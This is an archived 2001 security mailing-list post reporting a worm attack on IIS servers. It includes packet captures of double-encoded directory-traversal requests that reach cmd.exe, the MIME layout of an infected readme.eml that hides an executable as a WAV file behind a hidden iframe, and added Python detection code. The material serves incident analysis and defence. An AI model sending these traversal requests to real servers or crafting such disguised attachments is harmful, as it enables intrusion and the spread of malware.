[iwar] [fc:More.details.on.the.new.worm]

From: Fred Cohen (fc@all.net)
Date: 2001-09-18 09:17:26



[FC - from incidents@securityfocus.com]

It uses double-encoding exploits, and propagates both by adding 
javascript to the main page and by probing other systems...

Report:

Our systems got hit by 3 attempts, all unsuccessful, to exploit IIS:

Date    Time  D Source IP       Sport Dport   P
01Sep18 11:20 T 200.192.226.40   3933    80   T
01Sep18 11:20 T 200.192.226.40   3767    80   T
01Sep18 11:20 T 200.192.226.40   3572    80   T

  SOURCE: 200.192.226.40

  Packet 1 (source port 3572):

  45 00 00 9d 62 61 40 00 77 06 16 3d c8 c0 e2 28 xx xx xx xx  E...ba@.w..=...(xxxx
  0d f4 00 50 7b b0 1f 02 c3 7e 8c 4e 50 18 22 38 07 7a 00 00  ...P{....~.NP."8.z..
  47 45 54 20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35  GET /_vti_bin/..%255
  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35  c../..%255c../..%255
  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63  c../winnt/system32/c
  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31  md.exe?/c+dir HTTP/1
  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e  .0..Host: www..Connn
  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a           ection: close....

  Decoded: GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
           Host: www
           Connnection: close

  Packet 2 (source port 3767):

  45 00 00 9d b0 63 40 00 77 06 c8 3a c8 c0 e2 28 xx xx xx xx  E....c@.w..:...(xxxx
  0e b7 00 50 7b b2 1a 91 c3 4f d5 1e 50 18 22 38 c7 93 00 00  ...P{....O..P."8....
  47 45 54 20 2f 5f 6d 65 6d 5f 62 69 6e 2f 2e 2e 25 32 35 35  GET /_mem_bin/..%255
  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35  c../..%255c../..%255
  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63  c../winnt/system32/c
  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31  md.exe?/c+dir HTTP/1
  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e  .0..Host: www..Connn
  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a           ection: close....

  Decoded: GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
           Host: www
           Connnection: close

  Packet 3 (source port 3933):

  45 00 00 b9 39 65 40 00 77 06 3f 1d c8 c0 e2 28 xx xx xx xx  E...9e@.w.?....(xxxx
  0f 5d 00 50 7b b2 22 36 c3 4c 5a ed 50 18 22 38 dd 36 00 00  .].P{."6.LZ.P."8.6..
  47 45 54 20 2f 6d 73 61 64 63 2f 2e 2e 25 32 35 35 63 2e 2e  GET /msadc/..%255c..
  2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 63 2f 2e  /..%255c../..%255c/.
  2e 25 63 31 25 31 63 2e 2e 2f 2e 2e 25 63 31 25 31 63 2e 2e  .%c1%1c../..%c1%1c..
  2f 2e 2e 25 63 31 25 31 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79  /..%c1%1c../winnt/sy
  73 74 65 6d 33 32 2f 63 6d 64 2e 65 78 65 3f 2f 63 2b 64 69  stem32/cmd.exe?/c+di
  72 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 77 77  r HTTP/1.0..Host: ww
  77 0d 0a 43 6f 6e 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73  w..Connnection: clos
  65 0d 0a 0d 0a                                               e....

  Decoded: GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
           Host: www
           Connnection: close

---------------

When I connected to the originating server (femm.tdkomm.com.br), I 
saw the normal web page for the institution, plus a pop-up window for 
http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as 
follows:


MIME-Version: 1.0
Content-Type: multipart/related;
    type="multipart/alternative";
    boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
    boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
    charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
    name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

... (worm code follows)

I've inspected the executable code, and it reads like a worm. (doh)

------------------
http://all.net/ 
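As an added example (not part of the original post or the report it forwards), the following Python reproduces the two-stage decoding that the captured request lines rely on, so a log scanner can flag them: one percent-decode, a second decode of the result, and overlong two-byte UTF-8 such as %c1%1c read as a backslash. The decode order is an assumption modelled on the IIS behaviour the requests target; the three request lines are the ones from the capture above.

```python
from urllib.parse import unquote_to_bytes

def decode_overlong(data: bytes) -> bytes:
    """Fold C0/C1-led two-byte sequences to the ASCII byte they encode, as the
    vulnerable decoder did (0xC1 0x1C -> 0x5C '\\'); other bytes pass through."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((data[i] & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(data[i])
            i += 1
    return bytes(out)

def canonical_path(raw_path: str) -> str:
    """Two percent-decode passes (assumed IIS order), overlong UTF-8 folded, '\\' -> '/'."""
    once = unquote_to_bytes(raw_path)                # %255c -> %5c, %c1%1c -> c1 1c
    twice = decode_overlong(unquote_to_bytes(once))  # %5c -> '\', c1 1c -> '\'
    return twice.decode("latin-1").replace("\\", "/")

def escapes_root(path: str) -> bool:
    """True as soon as '..' segments climb above the web root."""
    depth = 0
    for seg in path.split("/"):
        depth += -1 if seg == ".." else (1 if seg and seg != "." else 0)
        if depth < 0:
            return True
    return False

def flag_request(request_line: str) -> dict:
    """Classify one HTTP request line taken from a log or a capture."""
    _method, target, _version = request_line.split(" ", 2)
    raw_path = target.split("?", 1)[0]
    path = canonical_path(raw_path)
    return {
        "decoded_path": path,
        "double_encoded": b"%" in unquote_to_bytes(raw_path),  # a '%' survives pass one
        "traversal": escapes_root(path),
        "shell": path.lower().endswith("/cmd.exe"),
    }

# The three request lines from the capture above, query string included.
CAPTURED = [
    "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
]
```

A request that is flagged only as double_encoded but not as traversal still deserves a look: a single decode pass is what a correctly patched server performs, so anything that needs the second pass to make sense is probing for the bug.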
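As an added example (not part of the original post), this Python parses a message with the layout of readme.eml above and flags the part whose declared type (audio/x-wav) disagrees with its name (readme.exe) and with its bytes, and which a zero-size iframe loads by Content-ID. The message is constructed for the example with the same headers, flattened to one multipart level, and carries a 20-byte MZ stub in place of the worm body.

```python
import base64
import email
from email import policy

# Constructed message with the readme.eml layout above, flattened to one
# multipart level; the "readme.exe" body is a 20-byte MZ stub, not the worm.
SAMPLE_EML = (
    "MIME-Version: 1.0\r\n"
    'Content-Type: multipart/related; boundary="====_ABC1234567890DEF_===="\r\n'
    "X-Unsent: 1\r\n\r\n--====_ABC1234567890DEF_====\r\n"
    'Content-Type: text/html; charset="iso-8859-1"\r\n'
    "Content-Transfer-Encoding: quoted-printable\r\n\r\n"
    "<HTML><BODY><iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0></iframe></BODY></HTML>\r\n"
    "--====_ABC1234567890DEF_====\r\n"
    'Content-Type: audio/x-wav; name="readme.exe"\r\n'
    "Content-Transfer-Encoding: base64\r\nContent-ID: <EA4DMGBP9p>\r\n\r\n"
    + base64.b64encode(b"MZ\x90\x00" + b"\x00" * 16).decode() + "\r\n"
    "--====_ABC1234567890DEF_====--\r\n"
)
EXEC_EXT = (".exe", ".com", ".scr", ".pif", ".bat")

def sniff(payload: bytes) -> str:
    """Minimal magic check: an MZ header is a DOS/PE executable whatever the label says."""
    return "application/x-msdownload" if payload.startswith(b"MZ") else "unknown"

def find_mismatches(raw: str) -> list:
    """Return (content_id, declared_type, sniffed_type, reasons) for each leaf part
    whose declared type disagrees with its name or bytes, noting any cid: reference."""
    msg = email.message_from_string(raw, policy=policy.default)
    leaves = [p for p in msg.walk() if not p.is_multipart()]
    html = b"".join(p.get_payload(decode=True) for p in leaves
                    if p.get_content_type() == "text/html").decode("latin-1")
    findings = []
    for part in leaves:
        declared = part.get_content_type()
        name = (part.get_filename() or "").lower()      # falls back to the name= param
        sniffed = sniff(part.get_payload(decode=True) or b"")
        cid = (part.get("Content-ID") or "").strip("<>")
        reasons = []
        if name.endswith(EXEC_EXT) and not declared.startswith("application/"):
            reasons.append("executable name declared as " + declared)
        if sniffed not in ("unknown", declared):
            reasons.append("bytes look like " + sniffed)
        if reasons and cid and ("cid:" + cid) in html:
            reasons.append("loaded by an HTML part via cid:" + cid)
        if reasons:
            findings.append((cid, declared, sniffed, reasons))
    return findings
```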




This archive was generated by hypermail 2.1.2 : 2001-09-29 21:08:45 PDT